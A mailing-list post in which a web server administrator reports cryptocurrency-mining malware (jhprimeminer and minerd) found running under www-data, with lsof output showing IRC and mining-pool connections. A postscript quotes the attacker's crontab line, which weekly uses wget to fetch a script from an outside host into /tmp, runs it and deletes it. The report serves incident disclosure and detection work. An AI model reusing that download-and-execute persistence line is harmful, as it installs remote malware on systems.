[Rkhunter-users] jhPrimeminer bot

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 454-5900

Good day

I cant seem to find where to submit to potential problems to rkhunter, 
so hopefully the powers that be are listening and will take into 
consideration of what I found.

This morning,  on one of the servers we manage, when we ran top we saw 
the two following processes.

5482 www-data  20   0  149m  44m 2368 S  750  0.6 228:25.51 jhprimeminer
5513 www-data  20   0  240m 4812 1176 S    8  0.1   1:33.89 minerd

Doing a lsof on the pid we get:

root@withheld-web01 /dev # lsof -p 5482
COMMAND    PID     USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
jhprimemi 5482 www-data  cwd    DIR               0,16      160 
112483832 /dev/shm/jhPrimeminer-master
jhprimemi 5482 www-data  rtd    DIR              253,0 4096         2 /
jhprimemi 5482 www-data  txt    REG               0,16   214680 
112484110 /dev/shm/jhPrimeminer-master/jhprimeminer
jhprimemi 5482 www-data  mem    REG              253,0    80712 134494 
/lib/libresolv-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,0    22928 131398 
/lib/libnss_dns-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,0    51728 131139 
/lib/libnss_files-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,2    93936 394581 
/usr/lib/libz.so.1.2.3.4
jhprimemi 5482 www-data  mem    REG              253,0    14696 131151 
/lib/libdl-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,0  1437064 134496 
/lib/libc-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,0   131258 131411 
/lib/libpthread-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,0    90504 131467 
/lib/libgcc_s.so.1
jhprimemi 5482 www-data  mem    REG              253,0   530736 131165 
/lib/libm-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,2  1043976 393286 
/usr/lib/libstdc++.so.6.0.13
jhprimemi 5482 www-data  mem    REG              253,0    31744 131137 
/lib/librt-2.11.3.so
jhprimemi 5482 www-data  mem    REG              253,2   356608 393543 
/usr/lib/libssl.so.0.9.8
jhprimemi 5482 www-data  mem    REG              253,2  1693344 393542 
/usr/lib/libcrypto.so.0.9.8
jhprimemi 5482 www-data  mem    REG               0,16    35911 
112457085 /dev/shm/lib/libgmpxx.so.4.3.2
jhprimemi 5482 www-data  mem    REG               0,16   531179 
112457045 /dev/shm/lib/libgmp.so.10.1.2
jhprimemi 5482 www-data  mem    REG              253,0   128744 131416 
/lib/ld-2.11.3.so
jhprimemi 5482 www-data    0r   CHR                1,3      0t0 1180 
/dev/null
jhprimemi 5482 www-data    1w   CHR                1,3      0t0 1180 
/dev/null
jhprimemi 5482 www-data    2w  FIFO                0,8      0t0 
112228026 pipe
jhprimemi 5482 www-data    3r   REG              253,2  5814328 398692 
/usr/lib/cgi-bin/php5
jhprimemi 5482 www-data    4u   REG              253,3 0        57 /tmp/.z
jhprimemi 5482 www-data    5u  sock                0,6      0t0 
112396829 can't identify protocol
jhprimemi 5482 www-data    6u  sock                0,6      0t0 
112523621 can't identify protocol
jhprimemi 5482 www-data    7u  sock                0,6      0t0 
112527946 can't identify protocol
jhprimemi 5482 www-data    8u  sock                0,6      0t0 
112537877 can't identify protocol
jhprimemi 5482 www-data    9u  sock                0,6      0t0 
112547857 can't identify protocol
jhprimemi 5482 www-data   10u  sock                0,6      0t0 
113824599 can't identify protocol
jhprimemi 5482 www-data   11u  IPv4          114777055 0t0       TCP 
WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED) < ---- SEE HERE
jhprimemi 5482 www-data   12u  IPv4          115198218 0t0       TCP 
WITHHELD:43904->ypool.net:10034 (ESTABLISHED) < ---- SEE HERE
jhprimemi 5482 www-data   23w   REG              253,4      373 1180063 
/var/log/newrelic/php_agent.log
jhprimemi 5482 www-data   26u  unix 0xffff88014727e900      0t0 
111962415 socket

root@withheld-web01 /dev # lsof -p 5513
COMMAND  PID     USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
minerd  5513 www-data  cwd    DIR               0,16      340 4738 /dev/shm
minerd  5513 www-data  rtd    DIR              253,0 4096         2 /
minerd  5513 www-data  txt    REG               0,16   592464 114161054 
/dev/shm/minerd
minerd  5513 www-data  mem    REG              253,0    80712 134494 
/lib/libresolv-2.11.3.so
minerd  5513 www-data  mem    REG              253,0    22928 131398 
/lib/libnss_dns-2.11.3.so
minerd  5513 www-data  mem    REG              253,0    51728 131139 
/lib/libnss_files-2.11.3.so
minerd  5513 www-data  mem    REG              253,0  1437064 134496 
/lib/libc-2.11.3.so
minerd  5513 www-data  mem    REG              253,0   131258 131411 
/lib/libpthread-2.11.3.so
minerd  5513 www-data  mem    REG              253,0    31744 131137 
/lib/librt-2.11.3.so
minerd  5513 www-data  mem    REG              253,0   128744 131416 
/lib/ld-2.11.3.so
minerd  5513 www-data    0r   CHR                1,3      0t0 1180 /dev/null
minerd  5513 www-data    1w   CHR                1,3      0t0 1180 /dev/null
minerd  5513 www-data    2w  FIFO                0,8      0t0 112228026 pipe
minerd  5513 www-data    3r   REG              253,2  5814328 398692 
/usr/lib/cgi-bin/php5
minerd  5513 www-data    4u   REG              253,3        0 57 /tmp/.z
minerd  5513 www-data    5u  sock                0,6      0t0 112396829 
can't identify protocol
minerd  5513 www-data    6u  sock                0,6      0t0 112523621 
can't identify protocol
minerd  5513 www-data    7u  sock                0,6      0t0 112527946 
can't identify protocol
minerd  5513 www-data    8u  sock                0,6      0t0 112537877 
can't identify protocol
minerd  5513 www-data    9u  sock                0,6      0t0 112547857 
can't identify protocol
minerd  5513 www-data   10u  sock                0,6      0t0 113824599 
can't identify protocol
minerd  5513 www-data   11u  IPv4          114777055      0t0 TCP 
WITHHELD:39120->mta5.girltang.com:ircd (ESTABLISHED)
minerd  5513 www-data   12u  IPv4          115358897      0t0 TCP 
WITHHELD:48657->stratum01.hashco.ws:8888 (ESTABLISHED)
minerd  5513 www-data   23w   REG              253,4      373 1180063 
/var/log/newrelic/php_agent.log
minerd  5513 www-data   26u  unix 0xffff88014727e900      0t0 111962415 
socket

Doing a clamscan it did not find anything.

Doing a ls in /dev/shm/jhPrimeminer-master and /dev/shm/minerd

root@withheld-web01 /dev # ls -la /dev/shm/jhPrimeminer-master
total 236K
drwxr-xr-x  3 www-data www-data  160 Nov  3 21:07 .
drwxrwxrwt 10 root     root      340 Nov  4 23:24 ..
-rw-r--r--  1 www-data www-data 2.6K Sep 17 08:22 .gitignore
-rwxr-xr-x  1 www-data www-data 210K Nov  3 21:07 jhprimeminer
-rw-r--r--  1 www-data www-data 1.6K Sep 17 08:22 jhprimeminer.example.conf
-rw-r--r--  1 www-data www-data 2.0K Nov  2 07:05 Makefile
-rw-r--r--  1 www-data www-data  714 Sep 17 08:22 README.md
drwxr-xr-x  3 www-data www-data  100 Sep 17 08:22 src

root@withheld-web01 /dev # ls -la /dev/shm/minerd
-rwxr-xr-x 1 www-data www-data 579K Jul 10 15:55 /dev/shm/minerd

Looking at /dev/shm/jhPrimeminer-master/README.md
Shows this is the code / project https://github.com/tandyuk/jhPrimeminer.git

Hope fully this help the project or someone else out there.

Sigh now to explain to the client.
Regards
Brent

P.s. I just saw in cron

cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cron installed on Sun Nov  3 15:21:02 2013)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh 
/tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1